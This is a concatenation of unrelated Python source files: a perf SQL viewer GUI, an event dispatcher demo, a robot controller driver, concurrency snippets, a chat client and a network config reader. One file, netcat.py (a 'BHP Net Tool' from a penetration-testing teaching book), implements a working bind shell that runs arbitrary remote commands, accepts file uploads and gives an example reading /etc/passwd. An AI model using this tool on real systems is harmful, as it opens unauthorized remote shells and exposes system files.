The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=tables>2. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
win = self.mdi_area.activeSubWindow()
ShrinkFont(win.view)
def EnlargeFont(self):
win = self.mdi_area.activeSubWindow()
EnlargeFont(win.view)
def EventMenu(self, events, reports_menu):
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
label = "All branches" if branches_events == 1 else "All branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewBranchView(x), self))
label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewSelectedBranchView(x), self))
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
            table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda a=None, t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
def Is64Bit(f):
    result = sizeof(c_void_p) == 8 # default to the native word size for non-ELF files
# ELF support only
pos = f.tell()
f.seek(0)
header = f.read(7)
f.seek(pos)
magic = header[0:4]
if sys.version_info[0] == 2:
eclass = ord(header[4])
encoding = ord(header[5])
version = ord(header[6])
else:
eclass = header[4]
encoding = header[5]
version = header[6]
    # header was read in binary mode, so compare against bytes (works on Python 2 and 3)
    if magic == b"\x7fELF" and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
result = True if eclass == 2 else False
return result
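# For reference, the standard ELF e_ident layout that the check above relies on:
# bytes 0-3 are the magic b"\x7fELF", byte 4 is EI_CLASS (1 = 32-bit, 2 = 64-bit),
# byte 5 is EI_DATA (1 = little-endian, 2 = big-endian), byte 6 is EI_VERSION (1).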
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
def FileFromBuildId(self, build_id):
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
# Database reference
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
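# Example (hypothetical connection string): for PostgreSQL, a dbname argument of the form
#   "hostname=db.local port=5432 username=perf password=secret dbname=pt_example"
# sets each connection parameter, while a bare token is taken as the database name itself.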
# Main
def Main():
    if len(sys.argv) < 2:
        printerr("Usage is: exported-sql-viewer.py {<database name> | --help-only}")
raise Exception("Too few arguments")
dbname = sys.argv[1]
if dbname == "--help-only":
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()
|
dispatcher.py
|
import abc
import dataclasses
import random
import threading
import time
import typing
@dataclasses.dataclass
class Event:
name: str
data: dict
def __str__(self) -> str:
return f'<Event: {self.name} Data: {self.data}>'
class Runnable:
def __init__(self):
self._runner = threading.Thread(target=self.run)
self._is_running: bool = False
@abc.abstractmethod
def run(self) -> None:
raise NotImplementedError
def start(self) -> None:
self._is_running = True
self._runner.start()
def stop(self) -> None:
self._is_running = False
class EventsQueue:
def __init__(self, length) -> None:
self._length: int = length
self.__lock: threading.Lock = threading.Lock()
self._queue: typing.List[Event] = []
    def push(self, event: Event) -> None:
        # Check length and append under the same lock to avoid a check-then-act race
        with self.__lock:
            if len(self._queue) < self._length:
                self._queue.append(event)
            else:
                print('Exceeded queue maximum length!')
    def pop(self):
        # Check emptiness and pop under the same lock to avoid a check-then-act race
        with self.__lock:
            if len(self._queue) > 0:
                return self._queue.pop(0)
            return None
class Consumer:
def __init__(self, name: str) -> None:
self._name: str = name
def consume_event(self, event: Event) -> None:
print(f'Consumer {self._name} got event {event}!')
class Producer(Runnable):
    def __init__(self, name: str):
        super(Producer, self).__init__()
        self._name: str = name
        # Runnable.__init__ already created self._runner; no need to recreate it here
        self._dispatcher: typing.Optional['Dispatcher'] = None
def set_dispatcher(self, dispatcher: 'Dispatcher') -> None:
self._dispatcher: 'Dispatcher' = dispatcher
def run(self):
while self._is_running:
self.emit()
time.sleep(random.randint(a=1, b=10))
print(f'Running producer {self._name}...')
def emit(self):
self._dispatcher.push_event_to_queue(
Event(name=f'{self._name}',
data={'foo': random.randint(a=1, b=10)})
)
class Dispatcher(Runnable):
def __init__(self):
super(Dispatcher, self).__init__()
self._producers: typing.List[Producer] = []
self._consumers: typing.List[Consumer] = []
self._queue: EventsQueue = EventsQueue(100)
def run(self):
while self._is_running:
event = self._queue.pop()
if event:
self.__send_event_to_consumers(event)
time.sleep(1)
print('Running dispatcher...')
def push_event_to_queue(self, event: Event) -> None:
self._queue.push(event)
def add_producer(self, producer: Producer) -> None:
self._producers.append(producer)
def add_consumer(self, consumer: Consumer) -> None:
self._consumers.append(consumer)
def __send_event_to_consumers(self, event: Event) -> None:
for consumer in self._consumers:
consumer.consume_event(event)
def main():
dispatcher = Dispatcher()
p1 = Producer('Foo')
p2 = Producer('Bar')
p3 = Producer('Baz')
p1.set_dispatcher(dispatcher)
p2.set_dispatcher(dispatcher)
p3.set_dispatcher(dispatcher)
dispatcher.add_producer(p1)
dispatcher.add_producer(p2)
dispatcher.add_producer(p3)
dispatcher.add_consumer(Consumer('Kyle'))
dispatcher.add_consumer(Consumer('Andrew'))
dispatcher.add_consumer(Consumer('Luke'))
dispatcher.start()
p1.start()
p2.start()
p3.start()
if __name__ == '__main__':
main()
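# A minimal shutdown sketch (hypothetical; main() above runs indefinitely). Since
# Runnable exposes start()/stop(), a bounded run could look like this:
#
#   dispatcher = Dispatcher()
#   producer = Producer('Demo')
#   producer.set_dispatcher(dispatcher)
#   dispatcher.add_producer(producer)
#   dispatcher.add_consumer(Consumer('Tester'))
#   dispatcher.start()
#   producer.start()
#   time.sleep(30)        # let events flow for a while
#   producer.stop()       # stop producers first so no new events are emitted
#   dispatcher.stop()     # then let the dispatcher loop exit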
|
astar.py
|
# astar.py
# Source: https://github.com/DrGFreeman/RasPiBot202V2
#
# MIT License
#
# Copyright (c) 2017 Julien de la Bruere-Terreault <drgfreeman@tuta.io>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This module defines the AStar class as a python interface to the Pololu
# A-Star 32U4 robot controller with Raspberry Pi bridge.
import time
import threading
import smbus
import struct
import sys
class AStar:
def __init__(self):
self._bus = smbus.SMBus(1)
self._version = sys.version_info.major
self.ledYellow = 0
self.ledGreen = 0
self.ledRed = 0
self._buttonA = 0
self._buttonB = 0
self._buttonC = 0
self._fwdSpeed = 0
self._turnRate = 0
self._lockSpeeds = False
self._x = 0
self._y = 0
self._phi = 0
self._lockOdometer = False
self._batteryMV = 0
self._lockBattery = False
self._panServo = 0 # Servo is disabled by default
self._tiltServo = 0 # Servo is disabled by default
self._mastServo = 0 # Servo is disabled by default
self._lockServos = False
self._notes = ''
self._resetOdometer = True
self.run()
# Wait to ensure we can read/write the buffer once before starting
time.sleep(.05)
# Print battery level
print("RPB202")
print("Battery level: " + str(round(self.getBatteryVolts(), 2)) + "V")
def _read_unpack(self, address, size, format):
"""Reads data from the I2C bus."""
self._bus.write_byte(20, address)
time.sleep(0.0001)
byte_list = [self._bus.read_byte(20) for _ in range(size)]
if self._version == 3:
# Python version 3
return struct.unpack(format, bytes(byte_list))
else:
# Python version 2
return struct.unpack(format, bytes(bytearray(byte_list)))
def _write_pack(self, address, format, *data):
"""Writes data to the I2C bus."""
if self._version == 3:
# Python version 3
data_array = list(struct.pack(format, *data))
else:
# Python version 2
data_array = map(ord, list(struct.pack(format, *data)))
self._bus.write_i2c_block_data(20, address, data_array)
time.sleep(0.0001)
def close(self):
"""Stops the I2C communication with the A-Star controller. This method
also stops the motors and turns off the A-Star LEDs."""
# Stop the running thread
self._active = False
# Stop the motors
self.setSpeeds(0, 0)
# Write the motors speeds directly to the I2C bus
self._write_pack(6, 'hh', 0, 0)
# Turn LEDs off
self.setYellowLED(0)
self.setGreenLED(0)
self.setRedLED(0)
# Write the LED values directly to the I2C bus
self._write_pack(0, 'BBB', 0, 0, 0)
def run(self):
"""Starts continuous I2C communication with A-Star controller in a
dedicated thread."""
self._active = True
th = threading.Thread(target = self._run, args = [])
th.start()
def _run(self):
"""Runs continuous I2C communication with A-Star controller. Runs as
long as AStar._active attribute is True. Call AStar.close() to stop the
thread."""
while self._active:
try:
# Read from buffer
# Buttons
self._buttonA, self._buttonB, self._buttonC = \
self._read_unpack(3, 3, '???')
# Odometer
self._lockOdometer = True
self._x, self._y, phi = self._read_unpack(10, 6, 'hhh')
# Convert phi reading from 1/1000 of radians to radians
self._phi = phi / 1000.
self._lockOdometer = False
# Battery level
self._lockBattery = True
self._batteryMV = self._read_unpack(17, 2, 'H')[0]
self._lockBattery = False
# Write to buffer
# Reset odometer on start-up
if self._resetOdometer:
self._resetOdometer = False
self._write_pack(16, 'B', 1)
time.sleep(.02)
else:
self._write_pack(16, 'B', 0)
# LEDs
self._write_pack(0, 'BBB', self.ledYellow, self.ledGreen, \
self.ledRed)
# Servos
self._lockServos = True
self._write_pack(34, 'HHH', self._panServo, self._tiltServo, \
self._mastServo)
self._lockServos = False
# Notes
if self._notes != "":
self._write_pack(19, 'B15s', 1, self._notes.encode('ascii'))
self._notes = ""
# Motors (turn rate in 1/1000 of radians / s)
self._lockSpeeds = True
turnRate = int(self._turnRate * 1000)
self._write_pack(6, 'hh', self._fwdSpeed, turnRate)
self._lockSpeeds = False
except IOError:
# Handle I2C communication error
raise IOError("IOError in AStar class")
self.close()
def buttonAIsPressed(self):
"""Returns True if the A-Star button A is pressed, False otherwise."""
return self._buttonA
def buttonBIsPressed(self):
"""Returns True if the A-Star button B is pressed, False otherwise."""
return self._buttonB
def buttonCIsPressed(self):
"""Returns True if the A-Star button C is pressed, False otherwise."""
return self._buttonC
def getBatteryVolts(self):
"""Returns the robot battery level in Volts."""
while self._lockBattery:
# Wait while battery attribute is locked
pass
return self._batteryMV / 1000.
def getOdometerPhi(self):
"""Returns the phi angle of the robot from the odometer in radians
(0 <= phi < 2*Pi). 0 corresponds to the robot pointing in the positive x
direction. The angle increases turning in direction of the positive y
axis (left turn).
"""
while self._lockOdometer:
# Wait while odometer attributes are locked
pass
return self._phi
def getOdometerXY(self):
"""Returns the x and y position of the robot from the odometer in mm."""
while self._lockOdometer:
# Wait while odometer attributes are locked
pass
return self._x, self._y
def setYellowLED(self, value = 0):
"""Sets the A-Star yellow led status (0 = Off, 1 = On)."""
if value == 0:
self.ledYellow = 0
else:
self.ledYellow = 1
def setGreenLED(self, value = 0):
"""Sets the A-Star green led status (0 = Off, 1 = On)."""
if value == 0:
self.ledGreen = 0
else:
self.ledGreen = 1
def setRedLED(self, value = 0):
"""Sets the A-Star red led status (0 = Off, 1 = On)."""
if value == 0:
self.ledRed = 0
else:
self.ledRed = 1
def setPanServo(self, us_4 = 0):
"""Sets the pan servo pulse width value in quarter-microseconds."""
while self._lockServos:
# Wait while servos attributes are locked
pass
self._panServo = us_4
def setTiltServo(self, us_4 = 0):
"""Sets the tilt servo pulse width value in quarter-microseconds."""
while self._lockServos:
# Wait while servos attributes are locked
pass
self._tiltServo = us_4
def setMastServo(self, us_4 = 0):
"""Sets the mast servo pulse width value in quarter-microseconds."""
while self._lockServos:
# Wait while servos attributes are locked
pass
self._mastServo = us_4
def playNotes(self, notes):
"""Play the specified notes on the A-Star buzzer. Refer to the Pololu
Buzzer documentation for details on how to use the buzzer."""
self._notes = notes
def resetOdometer(self):
"""Resets the odometer on the A-Star."""
self._resetOdometer = True
def setSpeeds(self, fwdSpeed = 0, turnRate = 0):
"""Sets the robot speed in mm/s and turn rate in radians/s"""
while self._lockSpeeds:
        # Wait while speeds attributes are locked
pass
self._fwdSpeed = fwdSpeed
self._turnRate = turnRate
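# A minimal usage sketch (hypothetical; assumes an A-Star controller is attached
# on I2C bus 1, as in __init__ above):
#
#   bot = AStar()                              # starts the background I2C thread
#   bot.setYellowLED(1)
#   bot.setSpeeds(fwdSpeed=100, turnRate=0.5)  # 100 mm/s forward, 0.5 rad/s turn
#   x, y = bot.getOdometerXY()
#   bot.close()                                # stops motors, LEDs and the thread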
|
netcat.py
|
#!/usr/bin/env python
import argparse
import socket
import shlex
import subprocess
import sys
import textwrap
import threading
def execute(cmd):
cmd = cmd.strip()
if not cmd:
return
output = subprocess.check_output(shlex.split(cmd), stderr=subprocess.STDOUT)
return output.decode()
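# Example (hypothetical): execute('whoami') runs the command locally and returns
# its combined stdout/stderr as text, e.g. 'user\n'.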
class NetCat:
def __init__(self, args, buffer):
self.args = args
self.buffer = buffer
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def run(self):
if self.args.listen:
self.listen()
else:
self.send()
def send(self):
self.socket.connect((self.args.target, self.args.port))
if self.buffer:
self.socket.send(self.buffer)
try:
while True:
recv_len = 1
response = ''
while recv_len:
data = self.socket.recv(4096)
recv_len = len(data)
response += data.decode()
print(len(response))
if recv_len < 4096:
break
if response:
print(response)
buffer = input('> ')
buffer += '\n'
self.socket.send(buffer.encode())
except KeyboardInterrupt:
print('User terminated.')
self.socket.close()
sys.exit()
def listen(self):
print('listening')
self.socket.bind((self.args.target, self.args.port))
self.socket.listen(5)
while True:
client_socket, _ = self.socket.accept()
client_thread = threading.Thread(target=self.handle, args=(client_socket,))
client_thread.start()
def handle(self, client_socket):
if self.args.execute:
output = execute(self.args.execute)
client_socket.send(output.encode())
elif self.args.upload:
print('in upload')
file_buffer = b''
while True:
print('.')
data = client_socket.recv(4096)
if data:
print('+')
file_buffer += data
print(len(file_buffer))
else:
break
with open(self.args.upload, 'wb') as f:
f.write(file_buffer)
message = f'Saved file {self.args.upload}'
client_socket.send(message.encode())
elif self.args.command:
cmd_buffer = b''
while True:
try:
client_socket.send(b' #> ')
while '\n' not in cmd_buffer.decode():
cmd_buffer += client_socket.recv(64)
response = execute(cmd_buffer.decode())
if response:
client_socket.send(response.encode())
cmd_buffer = b''
except Exception as e:
print(f'server killed {e}')
self.socket.close()
sys.exit()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='BHP Net Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''Example:
netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.whatisup # upload to file
netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
echo 'ABCDEFGHI' | ./netcat.py -t 192.168.1.108 -p 135 # echo local text to server port 135
netcat.py -t 192.168.1.108 -p 5555 # connect to server
'''))
parser.add_argument('-c', '--command', action='store_true', help='initialize command shell')
parser.add_argument('-e', '--execute', help='execute specified command')
parser.add_argument('-l', '--listen', action='store_true', help='listen')
parser.add_argument('-p', '--port', type=int, default=5555, help='specified port')
parser.add_argument('-t', '--target', default='127.0.0.1', help='specified IP')
parser.add_argument('-u', '--upload', help='upload file')
args = parser.parse_args()
if args.listen:
buffer = ''
else:
buffer = sys.stdin.read()
n = NetCat(args, buffer.encode())
n.run()
|
bingfa.py
|
import threading,time
import queue
# li=[1,2,3,4,5]
# def pri():
# while li:
# a=li[-1]
# print(a)
# time.sleep(1)
# try:
# li.remove(a)
# except Exception as e:
# print('----',a,e)
#
# if __name__ == '__main__':
# t1 = threading.Thread(target=pri, args=())
# t1.start()
# t2 = threading.Thread(target=pri, args=())
# t2.start()
# q=queue.LifoQueue()
#
# q.put(34)
# q.put(56)
# q.put(12)
#
# # priority queue
# q=queue.PriorityQueue()
# q.put([5,100])
# q.put([7,200])
# q.put([3,"hello"])
# q.put([4,{"name":"alex"}])
# if __name__ == '__main__':
# while 1:
# data = q.get()
# print(data)
# from contextlib import contextmanager
#
#
# @contextmanager
# def make_context():
# print('enter')
# try:
# yield "ok"
# except RuntimeError as err:
# print( 'error', err)
# finally:
# print('exit')
# if __name__ == '__main__':
# with make_context() as value:
# print(value)
# def consumer(name):
# print("--->ready to eat baozi...")
# while True:
# new_baozi = yield
# print("[%s] is eating baozi %s" % (name,new_baozi))
# #time.sleep(1)
#
# def producer():
#
# r = con.__next__()
# r = con2.__next__()
# n = 0
# while 1:
# time.sleep(1)
# print("\033[32;1m[producer]\033[0m is making baozi %s and %s" %(n,n+1) )
# con.send(n)
# con2.send(n+1)
#
# n +=2
#
#
# if __name__ == '__main__':
# con = consumer("c1")
# con2 = consumer("c2")
# p = producer()
# from greenlet import greenlet
#
#
# def test1():
# print(12)
# gr2.switch()
# print(34)
# gr2.switch()
#
#
# def test2():
# print(56)
# gr1.switch()
# print(78)
#
#
# if __name__ == '__main__':
# gr1 = greenlet(test1)
# gr2 = greenlet(test2)
# gr1.switch()
import gevent
import requests,time
start=time.time()
def f(url):
print('GET: %s' % url)
resp =requests.get(url)
data = resp.text
print('%d bytes received from %s.' % (len(data), url))
gevent.joinall([
gevent.spawn(f, 'https://www.python.org/'),
gevent.spawn(f, 'https://www.yahoo.com/'),
gevent.spawn(f, 'https://www.baidu.com/'),
gevent.spawn(f, 'https://www.sina.com.cn/'),
])
print("cost time:",time.time()-start)
|
ThreadClient.py
|
#ThreadClient.py
from socket import *
import threading
sevip = '127.0.0.1'
sevport = 62581
address = (sevip, sevport)
mysock = socket(AF_INET, SOCK_STREAM)
print("connecting to server {} on port {}...".format(sevip, sevport))
mysock.connect(address)
print("connection complete")
print("If you want to leave chat, just type !quit\n")
def receive():
global mysock
while True:
data = mysock.recv(1024)
        print(data.decode("UTF-8"), " *from Server")
mysock.close()
thread_recv = threading.Thread(target = receive, args = ()) # create the receiver thread
thread_recv.start() # start the thread
while True:
try:
data = input("")
except KeyboardInterrupt:
break
    if data == '!quit': # typing !quit ends the while loop.
break
mysock.send(bytes(data,"UTF-8"))
mysock.close()
print("disconnected")
|
kitchen.py
|
#kitchen.py
##############NETWORK CONFIG###############
import csv
import os
allfile = os.listdir()
def Save(data):
with open('config_kitchen.csv','w',newline='') as file:
#fw = 'file writer'
fw = csv.writer(file)
fw.writerows(data)
print('Save Done!')
def Read():
if 'config_kitchen.csv' not in allfile:
allip = [['kitchen','192.168.0.100',7000],['waiting','192.168.0.100',8000]]
Save(allip)
with open('config_kitchen.csv',newline='') as file:
#fr = 'file reader'
fr = csv.reader(file)
data = list(fr)
return data
readip = Read()
ip_kitchen = readip[0]
ip_waiting = readip[1]
kitchenip = ip_kitchen[1] # '192.168.0.133' #myip
kitchenport = int(ip_kitchen[2]) # 7800 #myport
waitingip = ip_waiting[1] # '192.168.0.133'
waitingport = int(ip_waiting[2]) # 7600
print('IP/PORT (kitchen): ',kitchenip,kitchenport)
